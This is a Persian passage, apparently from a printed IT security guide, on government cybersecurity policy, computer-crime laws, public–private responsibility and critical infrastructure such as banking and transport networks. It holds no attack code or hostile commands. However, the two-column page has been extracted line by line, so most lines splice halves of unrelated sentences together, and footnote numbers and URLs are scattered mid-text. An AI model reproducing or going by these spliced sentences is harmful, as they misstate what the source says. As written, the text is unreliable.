ﺧﺼﻮﺻﻲ ﻃﺮﺍﺣﻲ ﻭ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻭ ﻟﺬﺍ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺁﻧﻬـﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺑﻴﺶ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﭼﻨﻴﻦ ﻣﻘﺮﺭﺍﺗـﻲ ﺍﺳـﺖ .ﻓﻨـﺎﻭﺭﻱ
ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﺳﺖ. ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺳﺎﻳﺒﺮ ١ﺟﺪﻳﺪ ﺑـﺎ ﭼﻨـﺎﻥ
ﺑﻮﺍﺳﻄﺔ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺩﻻﻳﻞ ،ﻣـﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺳﺮﻋﺘﻲ ﺍﻧﺘﺸﺎﺭ ﻣﻲﻳﺎﺑﻨﺪ ﻛﻪ ﻣﻘﺮﺭﺍﺕ ﺩﻭﻟﺘﻲ ﺑﺮﺍﺣﺘـﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﻣﻴﺎﻥ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧـﺼﻮﺻﻲ ﺗﻘـﺴﻴﻢ ﺷـﺪﻩ ﺍﺳـﺖ .ﺑﻌﻨـﻮﺍﻥ ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﻮﺍﻧﻌﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺳﺮﻳﻊ ﭘﺎﺳﺨﻬﺎﻱ ﻣﺒﺘﻜﺮﺍﻧـﻪ ﺷـﻮﻧﺪ.
ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ ،ﺩﻭﻟﺖ ﻣﺴﺌﻮﻟﻴﺖ "ﺗﻨﻈﻴﻢ ﺍﻣﻮﺭ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ" ﺭﺍ ﺑﺮ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻴـﺎﻥ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺗﻘﻨﻴﻨـﻲ ﻭ
ﻋﻬﺪﻩ ﺩﺍﺭﺩ؛ ﻳﻌﻨﻲ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻱ ﺻﺤﻴﺢ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﻏﻴﺮ ﺗﻘﻨﻴﻨﻲ ﻳﻚ ﻧﻘﻄﺔ ﺗﻌﺎﺩﻝ ﭘﻴـﺪﺍ ﻛﻨـﻴﻢ .ﺑـﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ
ﺍﻳﻤﻨﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺑﻜﺎﺭ ﮔﻴﺮﺩ .ﺑﻌﻼﻭﻩ ﺍﺯ ﻟﺤﺎﻅ ﺟﻬـﺎﻧﻲ ﭼﻨﻴﻦ ﺗﻌﺎﺩﻟﻲ ،ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﺑﺮﺧﻲ ﻭﻳﮋﮔﻴﻬـﺎﻱ ﺫﺍﺗـﻲ ﻭ
ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺩﻭﻟﺖ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﻣﺠـﺎﺯﺍﺕ ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ﺍﺯ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺟﻪ ﻛﻨﻨﺪ .ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑـﺎ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ
ﺍﻧﺠــﺎﻡ ﺣﻤــﻼﺕ ﺑــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ،ﻣﺜــﻞ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﭘﻴﺸﻴﻦ ،ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ٢ﻳﻚ ﻓـﻀﺎﻱ ﻏﻴـﺮ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺍﺯ ﻗﺪﺭﺕ ﻗﻮﺍﻧﻴﻦ ﺣﻘﻮﻕ ﻭ ﺟﺰﺍ ﻛﻤﻚ ﺑﮕﻴﺮﺩ. ﻣﺘﻤﺮﻛﺰ ﺍﺳﺖ .ﺑﺨﺸﻲ ﺍﺯ ﻗﺪﺭﺕ ﺍﻳﻨﺘﺮﻧﺖ ﻧﺎﺷﻲ ﺍﺯ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ
ﻓﺮﺍﺗﺮ ﺍﺯ ﺁﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺩﻭﻟﺘﻬﺎ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛﻪ ﺑـﺮﺍﻱ ﺍﺳﺖ ﻛﻪ ﻓﺎﻗﺪ ﺩﺭﺑﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﻴﺸﺘﺮ ﻛـﺎﺭﺍﻳﻲ ﺁﻥ ﺩﺭ ﻣﺮﺯﻫـﺎﻱ
ﺍﺭﺗﻘﺎﻱ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﺷﺒﻜﻪ ﺍﺳﺖ ﺗﺎ ﺩﺭ ﻣﺮﻛﺰ ﺁﻥ .ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ
ﺑﺎﻳﺪ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﻀﺎﻋﻔﻲ ﺭﺍ ﻣﺘﺤﻤﻞ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺗﻼﺵ ﺑـﺮﺍﻱ ﺍﻳﻦ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ .ﺩﺭ ﺍﻳـﻦ ﻓـﺼﻞ
ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﻮﺳﻂ ﺩﻭﻟﺖ ﺍﺗﺨﺎﺫ ﺷـﻮﺩ ﻛـﻪ ﺑﺎﻋـﺚ ﺳﻠﺴﻠﻪ ﮔﺎﻣﻬﺎﻳﻲ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻧﺸﻮﻧﺪ ﻗﻮﺍﻧﻴﻦ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﻣﺠـﺎﻝ ﻇﻬـﻮﺭ ﺍﺑﺘﻜـﺎﺭﺍﺕ ﻭ ﺁﻧﻬﺎ ﻭ ﻣﺴﺘﻘﻞ ﺍﺯ ﺗﺼﻤﻴﻤﮕﻴﺮﻳﻬﺎﻱ ﻓﻨﻲ ،ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧـﻮﺩ
٣
ﻧﻮﺁﻭﺭﻳﻬﺎ ﺭﺍ ﺑﮕﻴﺮﻧﺪ ،ﺑﻠﻜـﻪ ﺩﺭﻋـﻮﺽ ﻣﻨﺠـﺮ ﺑـﻪ ﺣـﺪﺍﻛﺜﺮ ﺷـﺪﻥ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ.
ﻣﺰﺍﻳﺎﻱ ﺩﺧﺎﻟﺖ ﺩﻭﻟﺖ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﮔﺮﺩﻧـﺪ .ﺩﺭ ﻳـﻚ ﻓـﻀﺎﻱ ﺑﺎ ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ،
ﻫﻤﻜﺎﺭﻱ ،ﻧﻘﻄﻪ ﺗﻌﺎﺩﻟﻲ ﺑﻪ ﻗﺮﺍﺭ ﺯﻳﺮ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ: ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻳﻚ ﺟﺰﺀ ﻳﺎ ﺗﻤﺎﻣﻲ ﺍﺟﺰﺍﻱ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﻬﻢ ﻭ ﺣﺴﺎﺱ ﻛـﻪ ﻣﺒﺘﻨـﻲ
ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻛﺎﺭ ﻛﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺴﻮﻱ ﺍﻣﻨﻴـﺖ •
ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ )ﺑﺎﻧﻜـﺪﺍﺭﻱ ،ﺣﻤـﻞ ﻭ ﻧﻘـﻞ ،ﺍﻧـﺮﮊﻱ،
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺗﺮﻏﻴﺐ ﻣﻲﻛﻨﺪ ﺗـﺎ ﺳـﻮﺩ ﺑﻴـﺸﺘﺮﻱ
ﺗﻮﻟﻴﺪ ﻭ ﻏﻴﺮﻩ( ﺗﺤﺖ ﺗﻤﻠـﻚ ﻭ ﻋﻤﻠﻜـﺮﺩ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻗـﺮﺍﺭ
ﻛﺴﺐ ﻛﻨﻨﺪ؛
ﻼ ﺟﺪﻳـﺪ ﺍﺳـﺖ ،ﻭ ﺩﺭ ﺑﻌﻀﻲ ﻛﺸﻮﺭﻫﺎ ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﻣﺴﺌﻠﻪﺍﻱ ﻛـﺎﻣ ﹰ ۴ 1 Cyber Threats
ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨـﺎ ﺍﺳـﺖ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ،ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ،ﻭ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ 2 Cyberspace
ﺩﺭﺣﺎﻟﻴﻜــﻪ ﺑــﺎ ﻃﻴــﻒ ﻛــﺎﻣﻠﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺳــﻨﺘﻲ ﻣــﺮﺗﺒﻂ ﺑــﺎ ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ: ۳
ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﺩﺳﺖ ﺑﻪ ﮔﺮﻳﺒﺎﻥ ﻫﺴﺘﻨﺪ ،ﺑﺘﺎﺯﮔﻲ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﻧﻴﺰ http://www.abanet.org/abapubs/books/cybercr
ime
ﺩﺳﺖ ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻨﺪ. http://www.isn.ethz.ch/crn
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٣٢
ﺍﻳﻦ ﺑﺨﺶ ﻋﻼﻭﻩ ﺑـﺮ ﺗﻮﺿـﻴﺢ ﻣﻘـﺪﻣﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺕ ﺩﻭﻟﺘﻲ ﻭ ﺁﮔﺎﻩﺳﺎﺯﻱ؛ •
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ،ﺑﻪ ﺷﺮﺡ ﺟﺰﺋﻴﺎﺕ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﻛـﻪ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺒﻜﻪﻫـﺎﻱ •
ﻣﻄﺎﺑﻖ ﻗﻮﺍﻧﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﻨﺪ؛
ﭼﻨﺪﻣﻠﻴﺘﻲ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﺩ .ﻧﻜﺎﺕ ﻣﻄـﺮﺡ ﺷـﺪﻩ ﺑـﺎ ﺩﻗـﺖ ﻣﻔﺎﻫﻴﻢ ﻗﻮﺍﻧﻴﻦ ﺳﻨﺘﻲ ﻛﻪ ﻭﺍﺭﺩ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺪﻩﺍﻧﺪ؛ ﻭ •
ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷﺪﻩﺍﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻤﺮﻛﺰ ﺑـﺮ ﻣﻨـﺎﺑﻊ ﻭ ﻗﻮﺍﻧﻴﻦ ،ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺑـﺮ •
ﻣﺪﻟﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻣﺮﺍﻛﺰ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻧﺒﺎﻳﺪ ﺳـﺎﻳﺮ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻤﺮﻛﺰ ﻳﺎﻓﺘﻪﺍﻧﺪ.
ﻛﺸﻮﺭﻫﺎﻱ ﺟﻬﺎﻥ ﺭﺍ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻣﻄﺎﻟﻌـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺭﺩ ﻣﻔﻬﻮﻡ "ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ" ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺟﺰﺋﻲ ﺍﺯ ﻣﻮﺿـﻮﻉ
ﺑﺎﺯ ﺩﺍﺭﺩ .ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻣﻲ ﻛﺸﻮﺭﻫﺎ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻛﻨﻨﺪ،
١٠
ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﺑﻪ ﻧﺎﻡ "ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﺩﺭ ﮔﺴﺘﺮﺵ ﺍﻋﺘﻤﺎﺩ ﺍﻳﻨﺘﺮﻧﺘـﻲ"
ﭘﻴﺸﺮﻓﺖ ﻧﻤﺎﻳﻨﺪ ﻭ ﭼﺎﺭﭼﻮﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ .ﺍﻳﺠﺎﺩ ﻳـﻚ ﻣﺤـﻴﻂ ﻗﺎﺑـﻞ ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺭ ﻓـﻀﺎﻱ
ﺧﻮﺩ ﺑﺮﮔﺰﻳﻨﻨﺪ .ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻭ ﺍﻧـﺴﺎﻧﻲ ﺩﺭ ﺩﺳـﺘﺮﺱ ،ﻣﺘﻔـﺎﻭﺕ
ﺳﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨﺪ ﺗﻄﺒﻴﻖ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎ
ﻫﺴﺘﻨﺪ ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺍﺑﺘﺪﺍﻳﻲ ﺑﺎ ﺍﻳﻦ
ﺑﺮ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺳﺖ .ﺍﻳـﻦ ﺯﻣﻴﻨـﻪﻫـﺎ ﺷـﺎﻣﻞ ﺣﻤﺎﻳـﺖ ﺍﺯ
ﻣﻮﺿﻮﻉ ﺑﺮﺧﻮﺭﺩ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﺻﻮﻝ ﮔﻔﺘـﻪﺷـﺪﻩ ﺩﺭ ﺍﻳﻨﺠـﺎ ﻛـﺎﺭﺑﺮﺩ
ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ،٥ﺧﺼﻮﺻﻲ ﻣﺎﻧﺪﻥ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ،٦ﺣﻘـﻮﻕ
ﺟﻬﺎﻧﻲ ﺩﺍﺭﺩ .ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷـﺖ ﻛـﻪ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻭ
ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨﻮﻱ ٧ﻭ ﭼﺎﺭﭼﻮﺏ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ٨ﻣﻲﺑﺎﺷـﺪ .ﺩﺭ
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻛﺸﻮﺭﻫﺎ ﻧﻴﺴﺘﻨﺪ.
ﺩﻧﻴــﺎﻱ ﺑــﺪﻭﻥ ﺍﻳﻨﺘﺮﻧــﺖ ،ﻗــﺎﻧﻮﻥ ﺑــﺮﺍﻱ ﻣﻌــﺎﻣﻼﺕ ﺗﺠــﺎﺭﻱ ﻭ
ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺣﻤﺎﻳﺘﻬﺎﻳﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ .ﻗﺴﻤﺖ ﺍﻋﻈـﻢ ﺍﻳـﻦ
ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ
ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴـﺰ ﻗﺎﺑـﻞ ﺍﻋﻤـﺎﻝ ﻫـﺴﺘﻨﺪ ،ﺍﻣـﺎ
ﺩﺭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛﻨﺸﻲ ﺩﻭﻟـﺖ ﺑـﻪ ﻣـﺸﻜﻼﺕ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺪﻧﺒﺎﻝ ﮔﺴﺘﺮﺵ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧـﻪ ﻫـﺎ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ١١ﻧـﺎﻡ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ. ) (ICTﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﻛﻪ ﺁﻳﺎ ﺩﺭ ﻗﻮﺍﻧﻴﻦ
ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ،ﺷــﺒﻜﻪﺍﻱ ﺍﺯ ﺳــﺮﻣﺎﻳﻪﻫــﺎﻱ ﻓﻴﺰﻳﻜــﻲ ﻭ ﺁﻧﻬﺎ ﺧﻸﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣـﺎﻧﻊ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ ﻻﺯﻡ ﺑـﺮﺍﻱ
ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺭ ﺍﻗﺘـﺼﺎﺩ ﻳـﺎ ﺭﻓـﺎﻩ ﻳـﻚ ﺍﻓــﺰﺍﻳﺶ ﺍﻣﻨﻴــﺖ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﺷــﻮﺩ ﻳــﺎ ﺧﻴــﺮ .ﺩﺭ ﺣﻘﻴﻘــﺖ
ﻛﺸﻮﺭ ﺩﺍﺭﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺷﺒﻜﺔ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﻋﻼﻗﻪﻣﻨﺪ ﺑـﻪ ﮔـﺴﺘﺮﺵ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺣﻴﺎﺗﻲ ﺍﺳﺖ ﻛـﻪ ﺷـﺎﻣﻞ ﺗﻤـﺎﻣﻲ ﺑﺎﻧﻜﻬـﺎﻱ ﺧـﺼﻮﺻﻲ ،ﺑﺎﻧـﻚ ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﺑﻨﺪ ﻛﻪ ﻗﻮﺍﻧﻴﻦ ﺁﻧﻬـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺧـﺪﻣﺎﺕ
ﻣﺮﻛﺰﻱ ،ﺑﺎﺯﺍﺭﻫﺎﻱ ﻣﺒﺎﺩﻻﺕ ﻛﺎﻻ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺗﺒـﺎﺩﻝ ﭼـﻚ ،ﻭ ﻣﺎﻟﻲ ،ﻣﺎﻟﻜﻴﺖ ﺳﺎﻳﺒﺮ ﻭ ﺣﻤﺎﻳﺖ ﺍﺯ ﻣـﺼﺮﻑﻛﻨﻨـﺪﻩ ﺍﺯ ﺍﻋﺘﻤـﺎﺩ ﻳـﺎ
ﺩﻳﮕﺮ ﻧﻬﺎﺩﻫﺎﻳﻲ ﻛﻪ ﺩﺭﮔﻴـﺮ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺍﻋﺘﺒـﺎﺭﻱ ﻫـﺴﺘﻨﺪ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﻌﺎﻣﻼﺕ ﺧﺎﺭﺝ ﺍﺯ ﺩﻧﻴﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ
ﻣﻲﺷﻮﺩ .ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﺗﻤﺎﻣﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺟﻬـﺎﻥ ﺍﻳـﻦ ﻋﻤﻠﻴـﺎﺕ ﺑـﺎ ﻧﻴﺴﺖ .ﺍﺻﻼﺡ ﻗﻮﺍﻧﻴﻦ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴـﺮﺩ .ﺷـﺒﻜﺔ ﺣﻤـﻞ ﻭ ﻧﻘـﻞ ﻧﻴـﺰ ﺍﺯ ﺍﺻﻼﺣﺎﺕ ﺭﻭﻱ ﻗﻮﺍﻧﻴﻦ ﻛﻠﻲﺗﺮ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺗﻤﺮﻛﺰ ﺍﻳﻦ ﻛﺘـﺎﺏ
ﺯﻳﺮﺳﺎﺧﺖ ﺣﻴﺎﺗﻲ ﺩﻳﮕﺮﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺟـﺎﺩﻩﻫـﺎ ،ﭘﻠﻬـﺎ ،ﻛﺎﻧﺎﻟﻬـﺎ، ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﻪ
ﺧﻄﻮﻁ ﺭﺍﻩﺁﻫﻦ ﻭ ﻓﺮﻭﺩﮔﺎﻫﻬﺎ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺍﺳـﺖ .ﺯﻳﺮﺳـﺎﺧﺖ ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡﺷـﺪﻩ ﺭﻭﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﻧـﺪ
ﺣﻤﻞ ﻭ ﻧﻘﻞ ﻏﺎﻟﺒـﹰﺎ ﻓﻴﺰﻳﻜـﻲ ﻭ ﻣﻜـﺎﻧﻴﻜﻲ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﻋﻤﻠﻜـﺮﺩ )ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﺑﺨﺶ ﺳﻮﻡ ﻭ ﻧﻴﺰ ﺿﻤﺎﺋﻢ ﺫﻛﺮ ﺷﺪﻩﺍﻧـﺪ( ﻭ ﺳـﺆﺍﻻﺕ ﺩﺭ
